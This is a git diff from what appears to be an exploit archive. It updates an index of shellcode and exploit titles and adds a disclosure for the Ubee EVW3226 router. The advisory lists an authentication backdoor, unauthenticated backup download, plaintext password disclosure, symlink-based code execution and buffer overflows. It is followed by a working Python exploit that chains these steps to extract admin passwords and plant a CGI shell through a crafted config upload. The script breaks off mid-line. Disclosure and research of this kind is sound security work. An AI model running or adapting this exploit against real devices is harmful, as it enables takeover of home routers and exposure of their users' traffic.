-13725,platforms/lin_x86/shellcode/13725.txt,"Linux/x86 - change mode 0777 of _/etc/passwd_ with sys_chmod syscall shellcode (39 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0
+13725,platforms/lin_x86/shellcode/13725.txt,"Linux/x86 - change mode 0777 of '/etc/passwd' with sys_chmod syscall shellcode (39 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0
 13726,platforms/lin_x86/shellcode/13726.txt,"Linux/x86 - sys_execve(_/bin/sh__ _-c__ _reboot_) shellcode (45 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0
 13728,platforms/lin_x86/shellcode/13728.c,"Linux/x86 - sys_setuid(0) & sys_setgid(0) & execve (_/bin/sh_) shellcode (39 bytes)",2010-06-01,gunslinger_,lin_x86,shellcode,0
 13729,platforms/win_x86-64/shellcode/13729.txt,"Windows 7 x64 - cmd Shellcode (61 bytes)",2010-06-01,agix,win_x86-64,shellcode,0
@@ -13550,7 +13550,7 @@ id,file,description,date,author,platform,type,port
 15612,platforms/php/webapps/15612.txt,"SiteEngine <= 7.1 - SQL Injection",2010-11-25,Beach,php,webapps,0
 15613,platforms/windows/dos/15613.py,"NCH Officeintercom <= 5.20 - Remote Denial of Service",2010-11-25,"xsploited security",windows,dos,0
 15615,platforms/php/webapps/15615.html,"Frog CMS 0.9.5 - Multiple Vulnerabilities",2010-11-25,"High-Tech Bridge SA",php,webapps,0
-15616,platforms/arm/shellcode/15616.c,"Linux/ARM - Add root user _shell-storm_ with password _toor_ shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",arm,shellcode,0
+15616,platforms/arm/shellcode/15616.c,"Linux/ARM - Add root user 'shell-storm' with password 'toor' shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",arm,shellcode,0
 15617,platforms/multiple/remote/15617.txt,"VMware 2 Web Server - Directory Traversal",2010-11-25,clshack,multiple,remote,0
 15618,platforms/osx/shellcode/15618.c,"OS-X/Intel - setuid shell x86_64 shellcode (51 bytes)",2010-11-25,"Dustin Schultz",osx,shellcode,0
 15619,platforms/linux/dos/15619.c,"Linux Kernel <= 2.6.37 - 'setup_arg_pages()' Denial of Service",2010-11-26,"Roland McGrath",linux,dos,0
@@ -14987,7 +14987,7 @@ id,file,description,date,author,platform,type,port
 17221,platforms/php/webapps/17221.txt,"kusaba x <= 0.9.1 - Multiple Vulnerabilities",2011-04-28,"Emilio Pinna",php,webapps,0
 17222,platforms/linux/dos/17222.c,"libmodplug <= 0.8.8.2 - (.abc) Stack-Based Buffer Overflow PoC",2011-04-28,epiphant,linux,dos,0
 17223,platforms/windows/local/17223.pl,"NetOp Remote Control 8.0 / 9.1 / 9.2 / 9.5 - Buffer Overflow",2011-04-28,chap0,windows,local,0
-17224,platforms/osx/shellcode/17224.s,"OS-X/Intel - reverse_tcp shell x86_64 shellcode (131 bytes)",2011-04-29,hammackj,osx,shellcode,0
+17224,platforms/osx/shellcode/17224.s,"OS-X/Intel (x86_64) - reverse_tcp shell shellcode (131 bytes)",2011-04-29,hammackj,osx,shellcode,0
 17225,platforms/windows/local/17225.rb,"Subtitle Processor 7.7.1 - (.m3u) SEH Unicode Buffer Overflow",2011-04-28,Metasploit,windows,local,0
 17226,platforms/php/webapps/17226.txt,"phpGraphy 0.9.13b - Multiple Vulnerabilities",2011-04-29,"High-Tech Bridge SA",php,webapps,0
 17227,platforms/windows/dos/17227.py,"Microsoft Office Excel Axis Properties Record Parsing Buffer Overflow PoC",2011-04-29,webDEViL,windows,dos,0
@@ -15155,7 +15155,7 @@ id,file,description,date,author,platform,type,port
 17436,platforms/php/webapps/17436.txt,"iSupport 1.8 - SQL Injection",2011-06-23,"Brendan Coles",php,webapps,0
 17437,platforms/jsp/webapps/17437.txt,"ManageEngine ServiceDesk Plus 8.0 - Directory Traversal",2011-06-23,"Keith Lee",jsp,webapps,0
 17438,platforms/windows/remote/17438.txt,"IBM Web Application Firewall Bypass",2011-06-23,"Trustwave's SpiderLabs",windows,remote,0
-17439,platforms/sh4/shellcode/17439.c,"Linux/SuperH (sh4) - Add root user _shell-storm_ with password _toor_ shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",sh4,shellcode,0
+17439,platforms/sh4/shellcode/17439.c,"Linux/SuperH (sh4) - Add root user 'shell-storm' with password 'toor' shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",sh4,shellcode,0
 17441,platforms/windows/local/17441.py,"FreeAmp 2.0.7 - (.fat) Buffer Overflow Exploit",2011-06-23,"Iván García Ferreira",windows,local,0
 17442,platforms/jsp/webapps/17442.txt,"manageengine support center plus 7.8 build <= 7801 - Directory Traversal",2011-06-23,xistence,jsp,webapps,0
 17443,platforms/cgi/webapps/17443.txt,"ActivDesk 3.0 - Multiple security vulnerabilities",2011-06-23,"Brendan Coles",cgi,webapps,0
@@ -15767,7 +15767,7 @@ id,file,description,date,author,platform,type,port
 18156,platforms/php/webapps/18156.txt,"php video script SQL Injection",2011-11-25,longrifle0x,php,webapps,0
 18159,platforms/linux/dos/18159.py,"XChat Heap Overflow DoS",2011-11-25,"Jane Doe",linux,dos,0
 18162,platforms/linux_mips/shellcode/18162.c,"Linux/MIPS - execve /bin/sh shellcode (48 bytes)",2011-11-27,rigan,linux_mips,shellcode,0
-18163,platforms/linux_mips/shellcode/18163.c,"Linux/MIPS - Add user(UID 0) _rOOt_ with password _pwn3d_ shellcode (164 bytes)",2011-11-27,rigan,linux_mips,shellcode,0
+18163,platforms/linux_mips/shellcode/18163.c,"Linux/MIPS - Add user(UID 0) 'rOOt' with password 'pwn3d' shellcode (164 bytes)",2011-11-27,rigan,linux_mips,shellcode,0
 19400,platforms/php/webapps/19400.txt,"WordPress Website FAQ Plugin 1.0 - SQL Injection",2012-06-26,"Chris Kellum",php,webapps,0
 18165,platforms/windows/dos/18165.txt,"siemens automation license manager <= 500.0.122.1 - Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0
 18166,platforms/windows/dos/18166.txt,"Siemens SIMATIC WinCC Flexible (Runtime) - Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0
@@ -32061,7 +32061,7 @@ id,file,description,date,author,platform,type,port
 35582,platforms/php/webapps/35582.txt,"ProjectSend r561 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80
 35583,platforms/php/webapps/35583.txt,"Piwigo 2.7.2 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80
 35584,platforms/php/webapps/35584.txt,"GQ File Manager 0.2.5 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80
-35586,platforms/lin_x86-64/shellcode/35586.c,"Linux/x86-64 - Bind TCP 4444 Port Shellcode (81 bytes / 96 bytes with password)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0
+35586,platforms/lin_x86-64/shellcode/35586.c,"Linux/x86-64 - Bind 4444/TCP Port Shellcode (81 bytes / 96 bytes with password)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0
 35585,platforms/php/webapps/35585.txt,"Codiad 2.4.3 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80
 35587,platforms/lin_x86-64/shellcode/35587.c,"Linux/x86-64 - Reverse TCP connect shellcode (77 to 85 bytes / 90 to 98 bytes with password)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0
 35588,platforms/php/remote/35588.rb,"Lotus Mail Encryption Server (Protector for Mail) - LFI to RCE",2014-12-22,"Patrick Webster",php,remote,9000
@@ -32826,7 +32826,7 @@ id,file,description,date,author,platform,type,port
 36395,platforms/lin_x86/shellcode/36395.c,"Linux/x86 - Obfuscated execve(_/bin/sh_) shellcode (40 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
 36481,platforms/php/webapps/36481.txt,"WordPress TheCartPress Plugin 1.6 'OptionsPostsList.php' Cross Site Scripting",2011-12-31,6Scan,php,webapps,0
 36397,platforms/lin_x86/shellcode/36397.c,"Linux/x86 - Reverse TCP Shell shellcode (72 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
-36398,platforms/lin_x86/shellcode/36398.c,"Linux/x86 - TCP Bind Shell 33333 Port Shellcode (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
+36398,platforms/lin_x86/shellcode/36398.c,"Linux/x86 - Bind Shell 33333/TCP Port Shellcode (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
 36407,platforms/php/webapps/36407.txt,"Elxis CMS 2009 administrator/index.php URI XSS",2011-12-05,"Ewerson Guimaraes",php,webapps,0
 36408,platforms/php/webapps/36408.txt,"WordPress Pretty Link Plugin 1.5.2 - 'pretty-bar.php' Cross Site Scripting",2011-12-06,Am!r,php,webapps,0
 36410,platforms/php/webapps/36410.txt,"Simple Machines Forum 1.1.15 - 'fckeditor' Arbitrary File Upload",2011-12-06,HELLBOY,php,webapps,0
@@ -34427,7 +34427,7 @@ id,file,description,date,author,platform,type,port
 38123,platforms/php/dos/38123.txt,"PHP Session Deserializer Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0
 38124,platforms/android/remote/38124.py,"Android Stagefright - Remote Code Execution",2015-09-09,"Joshua J. Drake",android,remote,0
 38125,platforms/php/dos/38125.txt,"PHP unserialize() Use-After-Free Vulnerabilities",2015-09-09,"Taoguang Chen",php,dos,0
-38126,platforms/osx/shellcode/38126.c,"OS-X/x86-64 - tcp 4444 port bind Nullfree shellcode (144 bytes)",2015-09-10,"Fitzl Csaba",osx,shellcode,0
+38126,platforms/osx/shellcode/38126.c,"OS-X/x86-64 - 4444/TPC port bind Nullfree shellcode (144 bytes)",2015-09-10,"Fitzl Csaba",osx,shellcode,0
 38127,platforms/php/webapps/38127.php,"php - cgimode fpm writeprocmemfile bypass disable function demo",2015-09-10,ylbhz,php,webapps,0
 38128,platforms/cgi/webapps/38128.txt,"Synology Video Station 1.5-0757 - Multiple Vulnerabilities",2015-09-10,"Han Sahin",cgi,webapps,5000
 38129,platforms/php/webapps/38129.txt,"Octogate UTM 3.0.12 - Admin Interface Directory Traversal",2015-09-10,"Oliver Karow",php,webapps,0
@@ -35400,8 +35400,8 @@ id,file,description,date,author,platform,type,port
 39227,platforms/hardware/remote/39227.txt,"FingerTec Fingerprint Reader - Remote Access and Remote Enrollment",2016-01-12,"Daniel Lawson",hardware,remote,0
 39149,platforms/lin_x86-64/shellcode/39149.c,"Linux/x86-64 - Bind TCP Port Shellcode (103 bytes)",2016-01-01,Scorpion_,lin_x86-64,shellcode,0
 39150,platforms/php/webapps/39150.txt,"Open Audit SQL Injection",2016-01-02,"Rahul Pratap Singh",php,webapps,0
-39151,platforms/lin_x86-64/shellcode/39151.c,"Linux/x86-64 - Bind TCP 4444 Port Shellcode (103 bytes)",2016-01-02,Scorpion_,lin_x86-64,shellcode,0
-39152,platforms/lin_x86-64/shellcode/39152.c,"Linux/x86-64 - TCP 4444 port Bindshell with Password Prompt shellcode (162 bytes)",2016-01-02,"Sathish kumar",lin_x86-64,shellcode,0
+39151,platforms/lin_x86-64/shellcode/39151.c,"Linux/x86-64 - Bind 4444/TCP Port Shellcode (103 bytes)",2016-01-02,Scorpion_,lin_x86-64,shellcode,0
+39152,platforms/lin_x86-64/shellcode/39152.c,"Linux/x86-64 - Bindshell 4444/TCP with Password Prompt shellcode (162 bytes)",2016-01-02,"Sathish kumar",lin_x86-64,shellcode,0
 39153,platforms/php/webapps/39153.txt,"iDevAffiliate 'idevads.php' SQL Injection",2014-04-22,"Robert Cooper",php,webapps,0
 39154,platforms/hardware/remote/39154.txt,"Comtrend CT-5361T Router password.cgi Admin Password Manipulation CSRF",2014-04-21,"TUNISIAN CYBER",hardware,remote,0
 39155,platforms/linux/remote/39155.txt,"lxml 'clean_html' Function Security Bypass",2014-04-15,"Maksim Kochkin",linux,remote,0
@@ -35965,7 +35965,7 @@ id,file,description,date,author,platform,type,port
 39755,platforms/windows/remote/39755.py,"Acunetix WVS 10 - Remote Command Execution (System)",2016-05-02,"Daniele Linguaglossa",windows,remote,0
 39756,platforms/linux/remote/39756.rb,"Apache Struts Dynamic Method Invocation Remote Code Execution",2016-05-02,Metasploit,linux,remote,8080
 39757,platforms/android/local/39757.txt,"QSEE - PRDiag* Commands Privilege Escalation Exploit",2016-05-02,laginimaineb,android,local,0
-39758,platforms/lin_x86-64/shellcode/39758.c,"Linux/x86-64 - Bind TCP Port 1472 shellcode (IPv6) (199 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
+39758,platforms/lin_x86-64/shellcode/39758.c,"Linux/x86-64 - Bind 1472/TCP shellcode (IPv6) (199 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
 39759,platforms/php/webapps/39759.txt,"Alibaba Clone B2B Script - Admin Authentication Bypass",2016-05-04,"Meisam Monsef",php,webapps,80
 39760,platforms/php/webapps/39760.txt,"CMS Made Simple < 2.1.3 & < 1.12.1 - Web Server Cache Poisoning",2016-05-04,"Mickaël Walter",php,webapps,80
 39761,platforms/php/webapps/39761.txt,"Acunetix WP Security Plugin 3.0.3 - XSS",2016-05-04,"Johto Robbie",php,webapps,80
@@ -36055,7 +36055,7 @@ id,file,description,date,author,platform,type,port
 39848,platforms/php/webapps/39848.py,"Job Script by Scubez - Remote Code Execution",2016-05-23,"Bikramaditya Guha",php,webapps,80
 39849,platforms/php/webapps/39849.txt,"XenAPI 1.4.1 for XenForo - Multiple SQL Injections",2016-05-23,"Julien Ahrens",php,webapps,443
 39850,platforms/asp/webapps/39850.txt,"AfterLogic WebMail Pro ASP.NET 6.2.6 - Administrator Account Disclosure via XXE Injection",2016-05-24,"Mehmet Ince",asp,webapps,80
-39851,platforms/lin_x86/shellcode/39851.c,"Linux/x86 - TCP Bind Shell Port 4444 shellcode (656 bytes)",2016-05-25,"Brandon Dennis",lin_x86,shellcode,0
+39851,platforms/lin_x86/shellcode/39851.c,"Linux/x86 - Bind Shell Port 4444/TCP shellcode (656 bytes)",2016-05-25,"Brandon Dennis",lin_x86,shellcode,0
 39852,platforms/java/remote/39852.rb,"Oracle Application Testing Suite (ATS) - Arbitrary File Upload",2016-05-25,Metasploit,java,remote,8088
 39853,platforms/unix/remote/39853.rb,"Ubiquiti airOS Arbitrary File Upload",2016-05-25,Metasploit,unix,remote,443
 39854,platforms/java/remote/39854.txt,"PowerFolder Server 10.4.321 - Remote Code Execution",2016-05-25,"Hans-Martin Muench",java,remote,0
@@ -36245,7 +36245,7 @@ id,file,description,date,author,platform,type,port
 40051,platforms/php/webapps/40051.txt,"Ktools Photostore 4.7.5 - Multiple Vulnerabilities",2016-07-04,"Yakir Wizman",php,webapps,80
 40052,platforms/lin_x86-64/shellcode/40052.c,"Linux/x86-64 - NetCat Bind Shell Shellcode (64 bytes)",2016-07-04,CripSlick,lin_x86-64,shellcode,0
 40055,platforms/php/webapps/40055.py,"WordPress Real3D FlipBook Plugin - Multiple Vulnerabilities",2016-07-04,"Mukarram Khalid",php,webapps,80
-40056,platforms/lin_x86/shellcode/40056.c,"Linux/x86 - TCP Bind Shell Port 4444 shellcode (98 bytes)",2016-07-04,sajith,lin_x86,shellcode,0
+40056,platforms/lin_x86/shellcode/40056.c,"Linux/x86 - Bind Shell Port 4444/TCP shellcode (98 bytes)",2016-07-04,sajith,lin_x86,shellcode,0
 40057,platforms/php/webapps/40057.txt,"WebCalendar 1.2.7 - Multiple Vulnerabilities",2016-07-04,hyp3rlinx,php,webapps,80
 40058,platforms/php/webapps/40058.txt,"eCardMAX 10.5 - Multiple Vulnerabilities",2016-07-04,"Bikramaditya Guha",php,webapps,80
 40060,platforms/jsp/webapps/40060.txt,"24online SMS_2500i 8.3.6 build 9.0 - SQL Injection",2016-07-06,"Rahul Raz",jsp,webapps,80
@@ -36274,6 +36274,7 @@ id,file,description,date,author,platform,type,port
 40109,platforms/xml/webapps/40109.txt,"Apache Archiva 1.3.9 - Multiple CSRF Vulnerabilities",2016-07-13,"Julien Ahrens",xml,webapps,0
 40110,platforms/lin_x86/shellcode/40110.c,"Linux/x86 - Reverse Shell using Xterm ///usr/bin/xterm -display 127.1.1.1:10 shellcode (68 bytes)",2016-07-13,RTV,lin_x86,shellcode,0
 40112,platforms/cgi/webapps/40112.txt,"Clear Voyager Hotspot IMW-C910W - Arbitrary File Disclosure",2016-07-15,Damaster,cgi,webapps,80
+40145,platforms/windows/local/40145.txt,"Rapid7 AppSpider 6.12 - Local Privilege Escalation",2016-07-25,LiquidWorm,windows,local,0
 40113,platforms/linux/remote/40113.txt,"OpenSSHD <= 7.2p2 - User Enumeration",2016-07-18,"Eddie Harari",linux,remote,22
 40114,platforms/php/webapps/40114.py,"vBulletin 5.x/4.x - Persistent XSS in AdminCP/ApiLog via xmlrpc API (Post-Auth)",2014-10-12,tintinweb,php,webapps,0
 40115,platforms/php/webapps/40115.py,"vBulletin 4.x - SQLi in breadcrumbs via xmlrpc API (Post-Auth)",2014-10-12,tintinweb,php,webapps,0
@@ -36299,3 +36300,18 @@ id,file,description,date,author,platform,type,port
 40140,platforms/php/webapps/40140.txt,"TeamPass Passwords Management System 2.1.26 - Arbitrary File Download",2016-07-21,"Hasan Emre Ozer",php,webapps,80
 40141,platforms/bsd/local/40141.c,"mail.local(8) (NetBSD) - Local Root Exploit (NetBSD-SA2016-006)",2016-07-21,akat1,bsd,local,0
 40142,platforms/php/remote/40142.php,"Apache 2.4.7 & PHP <= 7.0.2 - openssl_seal() Uninitialized Memory Code Execution",2016-02-01,akat1,php,remote,0
+40146,platforms/linux/remote/40146.rb,"Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Remote Command Execution (Metasploit)",2016-07-25,xort,linux,remote,8000
+40147,platforms/linux/remote/40147.rb,"Barracuda Spam & Virus Firewall 5.1.3.007 - Remote Command Execution (Metasploit)",2016-07-25,xort,linux,remote,8000
+40148,platforms/windows/local/40148.py,"MediaCoder 0.8.43.5852 - .m3u SEH Exploit",2016-07-25,"Karn Ganeshen",windows,local,0
+40149,platforms/php/webapps/40149.rb,"Drupal CODER Module 2.5 - Remote Command Execution (Metasploit)",2016-07-25,"Mehmet Ince",php,webapps,80
+40150,platforms/php/webapps/40150.txt,"CodoForum 3.2.1 - SQL Injection",2016-07-25,"Yakir Wizman",php,webapps,80
+40151,platforms/windows/local/40151.py,"CoolPlayer+ Portable 2.19.6 - .m3u Stack Overflow (Egghunter+ASLR bypass)",2016-07-25,"Karn Ganeshen",windows,local,0
+40153,platforms/php/webapps/40153.txt,"GRR Système de Gestion et de Réservations de Ressources 3.0.0-RC1 - Arbitrary File Upload",2016-07-25,kmkz,php,webapps,80
+40154,platforms/php/webapps/40154.txt,"PHP gettext (gettext.php) 1.0.12 - Unauthenticated Code Execution",2016-07-25,kmkz,php,webapps,0
+40155,platforms/php/dos/40155.txt,"PHP 7.0.8_ 5.6.23 and 5.5.37 - bzread() Out-of-Bounds Write",2016-07-25,"Hans Jerry Illikainen",php,dos,80
+40156,platforms/cgi/webapps/40156.py,"Ubee EVW3226 Modem/Router 1.0.20 - Multiple Vulnerabilities",2016-07-25,"Gergely Eberhardt",cgi,webapps,80
+40157,platforms/cgi/webapps/40157.py,"Technicolor TC7200 Modem/Router STD6.02.11 - Multiple Vulnerabilities",2016-07-25,"Gergely Eberhardt",cgi,webapps,80
+40158,platforms/hardware/webapps/40158.txt,"Hitron CGNV4 Modem/Router 4.3.9.9-SIP-UPC - Multiple Vulnerabilities",2016-07-25,"Gergely Eberhardt",hardware,webapps,80
+40159,platforms/hardware/webapps/40159.txt,"Compal CH7465LG-LC Modem/Router CH7465LG-NCIP-4.50.18.13-NOSH - Multiple Vulnerabilities",2016-07-25,"Gergely Eberhardt",hardware,webapps,80
+40160,platforms/hardware/webapps/40160.py,"Bellini/Supercook Wi-Fi Yumi SC200 - Multiple Vulnerabilities",2016-07-25,"James McLean",hardware,webapps,0
+40161,platforms/java/webapps/40161.txt,"Micro Focus Filr 2 2.0.0.421_ Filr 1.2 1.2.0.846 - Multiple Vulnerabilities",2016-07-25,"SEC Consult",java,webapps,9443
diff --git a/platforms/cgi/webapps/40156.py b/platforms/cgi/webapps/40156.py
new file mode 100755
index 000000000..7b891739f
--- /dev/null
+++ b/platforms/cgi/webapps/40156.py
@@ -0,0 +1,305 @@ +''' +Ubee EVW3226 modem/router multiple vulnerabilities +-------------------------------------------------- + +Platforms / Firmware confirmed affected: +- Ubee EVW3226, 1.0.20 +- Product page: http://www.ubeeinteractive.com/products/cable/evw3226 + +Vulnerabilities +--------------- +Insecure session management + +The web interface does not use cookies at all. If admin login is +successful, the IP address of the admin user is stored and everybody can +access the management interface with the same IP. + +Local file inclusion + +Setup.cgi can read any file with .htm extension using directory +traversal in the gonext parameter. Although the file must have htm +extension, the local file inclusion can be used to map directories, +because the response is different depending on whether directory exists +or not. + +POC: + +http:///cgi-bin/setup.cgi?gonext=../www/main2 + +Backup file is not encrypted + +Although the web interface requires a password for encrypting the backup +file, the encryption is not performed. In order to backup file password, +the plain password is stored in the backup file, which is a standard tgz +(gzipped tar) file with a simple header. + +Backup file disclosure + +When a user requests a backup file, the file is copied into www root in +order to make download possible. However, the backup file is not removed +from the www root after download. Since there is not any session check +required to download the backup file, an attacker is able to download it +without authentication from LAN until the next reboot. +Since the backup file is not encrypted and contains the plain admin +password, the router can be compromised from LAN. + +POC: + +http:///Configuration_file.cfg + +Authentication bypass (backdoor) + +The web interface bypasses authentication if the HTML request contains +the factoryBypass parameter. In this case a valid session is created and +the attacker can gain full control over the device. 
+ +POC: + +http:///cgi-bin/setup.cgi?factoryBypass=1 + +Arbitrary code execution + +The configuration file restore function receives a compressed tar file, +which is extracted to the /tmp folder. Tar files may contain symbolic +links, which can link out from the extraction folder. By creating a +configuration file with a symbolic link and a folder which uses this +link, the attacker can write out from the backup folder and can +overwrite any file in the writable file-system. +Since www is copied to the writable file system at boot time (under +/tmp), the attacker can insert a new cgi script that executes arbitrary +code with root privileges. + +Default SSID and passphrase can be calculated + +The default SSID and passphrase are derived only from the MAC address. +Since the MAC address of the device is broadcasted via WiFi, the default +password can be calculated easily. +Combined with code execution and factory bypass, even a botnet of Ubee +routers can be deployed easily. + +Buffer overflow in configuration restore + +During the configuration restore process, the backup file password is +read from the pass.txt file. If the password is large enough (larger +than 65536), a stack based buffer overflow is caused, because the file +content is loaded with fscanf(“%s”) to a stack based local variable. The +stack based buffer overflow can be used to execute arbitrary code with +root privileges. + +Buffer overflow in configuration file request + +The web interface identifies the configuration file download request by +checking that the URL contains the Configuration_file.cfg string. If +this string is found, the whole URL is copied into a stack based buffer, +which can cause a buffer overflow. This stack based buffer overflow can +be used to execute arbitrary code with root privileges without +authentication. 
+ +POC: + +http://192.168.0.1/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaConfiguration_file.cfg + +Buffer overflow in next file name + +The gonext variable in the POST requests specifies the HTML file, which +the cgi script should be loaded. If the gonext variable is large enough +(larger than 6512 bytes), a stack based buffer overflow is caused, which +can be used to execute arbitrary code with root privileges without +authentication. + +Communication on the UPC Wi-Free can be sniffed within the device + +The UPC Wi-Free communication is not separated correctly inside the +device, because the whole communication can be sniffed after gaining +root access to the device. + +Timeline +-------- +- 2015.06.24: Presenting the Ubee router problems to the CTO of UPC Magyarorszag +- 2015.07.16: UPC contacted Ubee and required some more proof about some specific problems +- 2015.07.16: Proofs, that the default passphrase calculation of the Ubee router was broken, were sent to UPC +- 2015.07.20: UPC requested the POC code +- 2015.07.21: POC code was sent to UPC +- 2015.07.30: We sent some new issues affecting the Ubee router and other findings in Technicolor TC7200 and Cisco EPC3925 devices to UPC +- Between 2015.07.31 and 08.12 there were several e-mail and phone communications between technical persons from Liberty Global to clarify the findings +- 2015.08.19: UPC sent out advisory emails to its end users to change the default WiFi passphrase +- 2015.09.16: Ubee Interactive also asked some questions about the vulnerabilities +- 2015.09.24: We sent detailed answers to Ubee Interactive +- 2016.01.27: UPC Magyarorszag send out a repeated warning to its end users about the importance of the change of the default passphrases. 
+- 2016.02.16: Face to face meeting with Liberty Global security personnel in Amsterdam headquarters +- 2016.02.18: A proposal was sent to Liberty Global suggesting a wardriving experiment in Budapest, Hungary to measure the rate of end users who are still using the default passphrases. + +POC +--- +POC script is available to demonstrate the following problems [3]: + +- Authentication bypass +- Unauthenticated backup file access +- Backup file password disclosure +- Code execution + +Video demonstration is also available [1], which presents the above problems and how these can be combined to obtain full access to the modem. + +Recommendations +--------------- +Since only the ISP can update the firmware, we can recommend for users to change the WiFi passphrase. + +Credits +------- +This vulnerability was discovered and researched by Gergely Eberhardt from SEARCH-LAB Ltd. (www.search-lab.hu) + +References +---------- +[1] http://www.search-lab.hu/advisories/secadv-20160720 +[2] https://youtu.be/cBclw7uUuO4 +[3] https://github.com/ebux/Cable-modems/tree/master/Ubee +''' +# +# POC code for Ubee EVW3226 +# +# Demonstrates the following vulnerabilities +# - Authentication bypass +# - Unauthenticated backup file access +# - Backup file password disclosure +# - Code execution +# +# Credit: Gergely Eberhardt (@ebux25) from SEARCH-LAB Ltd. 
(www.search-lab.hu) +# +# Advisory: http://www.search-lab.hu/advisories/secadv-20150720 + +import sys +import requests +import tarfile +import struct +import binascii +import re +import shutil + +config_data = binascii.unhexlify('00003226FFA486BE000001151F8B0808EB7D4D570400706F635F636F6E666967' + '2E74617200EDD53D4FC3301006E09BF32BDC30A78E9D3816AC8811898185D104' + '8B4404C7CA1DA4FC7B121A900A0296A66A153FCBF96BB15F9D8C0DCC2E1D68AD' + '87FA61A7EE8E65AEB48254C86C38CE247F351DA767CFFBBEE7308F1724D33106' + '5DDBD21FC7FEDD3F51DE20AE6933EBD5C6648B3CFF3D7F21BEE52F649E014BE1' + '00169EFFD5F5CDED9DC88A730896081B5E3ED6C97DED3859A43556B077DBF667' + '3FD6BFDA5F291052CB4CEA421502C6DF221707EEFF853A5BF1317BAC225B562D' + 'BB6C1D594709BD797BC1C86E88FBC6D46EBB1BC753AD4CF9641F1836AB389A96' + '3C8A38F2F83975968687A5389A062C712682200882E058BC0383AF448C000E0000') + +class ubee: + def __init__(self, addr, port): + self.addr = addr + self.port = port + self.s = requests.Session() + + def getUri(self, uri): + return 'http://%s:%d/%s'%(self.addr,self.port,uri) + + def authenticationBypass(self): + self.s.get(self.getUri('cgi-bin/setup.cgi?factoryBypass=1')) + self.s.get(self.getUri('cgi-bin/setup.cgi?gonext=main2')) + + def parseNVRam(self, nv): + o = 0x1c + pos = 2 + nvdata = {} + while(True): + stype = struct.unpack('!H', nv[o:o+2])[0] + slen = struct.unpack('!H', nv[o+2:o+4])[0] + sval = nv[o+4:o+4+slen] + nvdata[stype] = sval + pos += slen + o = o+slen+4 + if (o >= len(nv) ): + break + return nvdata + + def parseBackupFile(self, fname): + tar = tarfile.open("Configuration_file.cfg", "r:gz") + for tarinfo in tar: + if tarinfo.isreg(): + if (tarinfo.name == 'pass.txt'): + print 'config file password: %s'%(tar.extractfile(tarinfo).read()) + elif (tarinfo.name == '1'): + nvdata = self.parseNVRam(tar.extractfile(tarinfo).read()) + print 'admin password: %s'%(nvdata[3]) + tar.close() + + def saveBackup(self, r, fname): + if r.status_code == 200: + resp = '' + for chunk in r: + resp += chunk + 
open(fname, 'wb').write(resp[0xc:]) + + def createBackupFile(self, fname): + # get validcode (CSRF token) + r = self.s.get(self.getUri('cgi-bin/setup.cgi?gonext=RgSystemBackupAndRecoveryBackup')) + m = re.search('ValidCode = "([^"]+)"', r.text) + if (m == None): + print 'ValidCode is not found' + return + validCode = m.group(1) + + # create backup file + r = self.s.get(self.getUri('cgi-bin/setup.cgi?gonext=Configuration_file.cfg&Password=secretpass&ValidCode=%s')%(validCode)) + if (len(r.text) > 0): + self.saveBackup(r, fname) + + def downloadBackupFile(self, fname): + r = self.s.get(self.getUri('Configuration_file.cfg')) + if (len(r.text) > 0): + print len(r.text) + self.saveBackup(r, fname) + return True + return False + + def restoreConfigFile(self, fname = '', passwd = 'badpasswd'): + # get validcode (CSRF token) + r = self.s.get(self.getUri('cgi-bin/setup.cgi?gonext=RgSystemBackupAndRecoveryRestore')) + m = re.search('name="ValidCode" value="([^"]+)"', r.text) + if (m == None): + print 'ValidCode is not found' + return + validCode = m.group(1) + + # restore config file + if (fname == ''): + cfg_data = config_data + else: + cfg_data = open(fname, 'rb').read() + r = self.s.post(self.getUri('cgi-bin/restore.cgi'), files=(('ValidCode', (None, validCode)), ('PasswordStr', (None, passwd)), ('browse', cfg_data), ('file_name', (None, 'Configuration_file.cfg')))) + if (r.text.find('alert("Password Failure!")') > 0): + return True + else: + return False + + def getShellResponse(self): + r = self.s.get(self.getUri('cgi-bin/test.sh')) + print r.text + +#------------------------------------ + +if (len(sys.argv) < 2): + print 'ubee_evw3226_poc.py addr [port]' +addr = sys.argv[1] +port = 80 +if (len(sys.argv) == 3): + port = int(sys.argv[2]) + +# create ubee object +u = ubee(addr, port) + +# perform authentication bypass +u.authenticationBypass() +# download backup file if it is exists (auth is not required) +if (not u.downloadBackupFile('Configuration_file.cfg')): + # 
